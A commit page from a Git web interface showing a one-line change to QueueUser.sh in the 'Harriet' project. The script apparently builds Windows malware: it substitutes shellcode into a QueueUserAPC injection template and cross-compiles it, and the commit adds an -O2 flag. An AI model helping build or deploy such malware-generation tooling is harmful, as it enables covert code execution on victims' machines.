Prechádzať zdrojové kódy

Update QueueUser.sh

assume-breach 2 rokov pred
rodič
commit
599647c0bb
1 zmenil súbory, kde vykonal 1 pridanie a 1 odobranie
  1. 1 1
      Harriet/Harriet/QueueUserAPC/QueueUser.sh

+ 1 - 1
Harriet/Harriet/QueueUserAPC/QueueUser.sh

@@ -85,7 +85,7 @@ Random8=$(cat shell.txt)
 sed -i "s/Random8/$Random8/g" Harriet/QueueUserAPC/Resources/template.cpp
 sed -i "s/Random8/$Random8/g" Harriet/QueueUserAPC/Resources/template.cpp
 rm shell*
 rm shell*
 echo -e ${yellow}"+++Compiling Malware+++"${clear}
 echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE Harriet/QueueUserAPC/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
+x86_64-w64-mingw32-g++ -o $MALWARE Harriet/QueueUserAPC/Resources/template.cpp -fpermissive -Wno-narrowing -O2>/dev/null 2>&1
 echo ""
 echo ""
 sleep 2
 sleep 2
 echo -e ${yellow}"***Malware Compiled***"${clear}
 echo -e ${yellow}"***Malware Compiled***"${clear}